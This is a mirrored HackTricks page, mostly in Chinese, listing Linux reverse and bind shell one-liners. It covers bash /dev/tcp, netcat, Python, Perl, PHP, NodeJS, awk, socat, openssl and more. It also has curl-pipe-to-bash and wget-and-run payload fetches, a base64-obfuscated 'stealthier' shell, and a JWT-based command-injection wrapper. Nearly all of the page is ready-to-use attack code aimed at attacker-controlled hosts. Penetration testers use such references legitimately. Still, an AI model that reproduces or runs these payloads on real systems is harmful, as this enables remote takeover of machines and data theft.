Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/shells/linux.md

18 KiB
Raw Blame History

Shells - Linux

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

如果您对这些shell有任何疑问可以使用 https://explainshell.com/ 进行检查

Full TTY

一旦获得反向shell 阅读此页面以获取完整的TTY

Bash | sh

curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0

符号安全的shell

#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

Shell解释

  1. bash -i: 此部分命令启动一个交互式 (-i) Bash shell。
  2. >&: 此部分命令是将标准输出 (stdout) 和标准错误 (stderr) 重定向到同一目的地的简写表示。
  3. /dev/tcp/<ATTACKER-IP>/<PORT>: 这是一个特殊文件,表示与指定IP地址和端口的TCP连接
  • 通过将输出和错误流重定向到此文件该命令有效地将交互式shell会话的输出发送到攻击者的机器。
  1. 0>&1: 此部分命令将标准输入 (stdin) 重定向到与标准输出 (stdout) 相同的目的地

创建文件并执行

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh

正向 Shell

在处理基于 Linux 的 Web 应用中的 远程代码执行 (RCE) 漏洞时,通过网络防御措施如 iptables 规则或复杂的数据包过滤机制可能会阻碍实现反向 shell。在这种受限制的环境中一种替代方法是建立一个 PTY伪终端shell以更有效地与受损系统进行交互。

一个推荐的工具是 toboggan,它简化了与目标环境的交互。

要有效地利用 toboggan创建一个针对目标系统 RCE 上下文的 Python 模块。例如,一个名为 nix.py 的模块可以按以下结构组织:

import jwt
import httpx

def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)

response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)

# Check if the request was successful
response.raise_for_status()

return response.text

然后,您可以运行:

toboggan -m nix.py -i

直接利用交互式shell。您可以添加-b以进行Burpsuite集成并删除-i以获得更基本的rce包装。

另一种可能性是使用IppSec的前向shell实现https://github.com/IppSec/forward-shell

您只需要修改:

  • 受攻击主机的URL
  • 您的有效负载的前缀和后缀(如果有的话)
  • 发送有效负载的方式(头部?数据?额外信息?)

然后,您可以发送命令,甚至使用upgrade命令来获得完整的PTY请注意管道的读取和写入会有大约1.3秒的延迟)。

Netcat

nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

gsocket

https://www.gsocket.io/deploy/中查看

bash -c "$(curl -fsSL gsocket.io/x)"

Telnet

Telnet是一种用于远程登录的网络协议。

telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Whois

攻击者

while true; do nc -l <port>; done

将命令写下来按回车然后按CTRL+D停止STDIN

受害者

export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done

Python

Python

#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Perl

Perl是一种通用的脚本语言被广泛用于系统管理、文本处理、网络编程等领域。Perl脚本可以在Linux系统上运行并且通常被用于编写各种类型的脚本和工具。Perl具有强大的正则表达式功能使其成为处理文本数据的理想选择。

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

Ruby Shell

Ruby shell is a simple shell written in Ruby that allows for easy command execution. It is useful for executing commands on a target machine once a Ruby interpreter is available.

To use the Ruby shell, you can start by running the following command:

ruby ruby_shell.rb

Once the Ruby shell is running, you can execute commands on the target machine by typing them in the shell prompt.

Ruby One-Liners

Ruby one-liners are short and concise Ruby scripts that can be used for various purposes, including data manipulation, text processing, and system administration tasks. They are especially useful for quick tasks that can be accomplished with a single line of code.

Here are some examples of Ruby one-liners:

  • Print the current date and time:
ruby -e 'puts Time.now'
  • List all files in the current directory:
ruby -e 'puts Dir.glob("*")'
  • Base64 encode a string:
ruby -r base64 -e 'puts Base64.encode64("hello")'

Ruby one-liners can be a powerful tool in a hacker's arsenal for quick and efficient tasks.

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP

PHP是一种流行的服务器端脚本语言通常用于Web开发。

// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

Java

Java是一种通用编程语言具有跨平台特性适用于各种应用程序开发。 Java程序可以在不同操作系统上运行只需安装适当的Java运行时环境JRE。 Java程序通常编译为字节码然后在Java虚拟机JVM上运行。 Java在网络应用程序和移动应用程序开发中广泛使用。

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ncat

Ncat是一个功能强大的网络工具可以用于连接、读取和写入数据以及进行端口扫描和监听。

victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl

Golang

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Lua

Lua是一种轻量级、高效的脚本语言常用于嵌入式系统和游戏开发。 Lua脚本可以通过解释器执行也可以编译成字节码运行。 Lua具有简洁的语法和强大的扩展能力被广泛应用于各种领域。 Lua脚本可以通过C语言扩展实现与底层系统的交互。 Lua的灵活性和易用性使其成为许多开发者的首选。

#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

NodeJS

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()


or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

OpenSSL

攻击者Kali

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

受害者

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Socat

https://github.com/andrew-d/static-binaries

绑定 shell

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

反向 shell

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Awk

Awk是一种强大的文本分析工具可用于在Linux系统上处理文本数据。Awk提供了灵活的功能可以轻松提取和处理文本文件中的特定信息。Awk通常与管道一起使用使其成为自动化任务和数据处理的有用工具。

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Finger

攻击者

while true; do nc -l 79; done

将命令写下来按回车然后按CTRL+D停止STDIN

受害者

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done

Gawk

Gawk

#!/usr/bin/gawk -f

BEGIN {
Port    =       8080
Prompt  =       "bkd> "

Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}

Xterm

这将尝试连接到您系统的6001端口

xterm -display 10.0.0.1:1

要捕获反向 shell您可以使用以下命令将在 6001 端口监听):

# Authorize host
xhost +targetip
# Listen
Xnest :1

Groovy

frohoff注意Java反向shell也适用于Groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

参考资料

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

从零开始学习AWS黑客技术成为专家 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式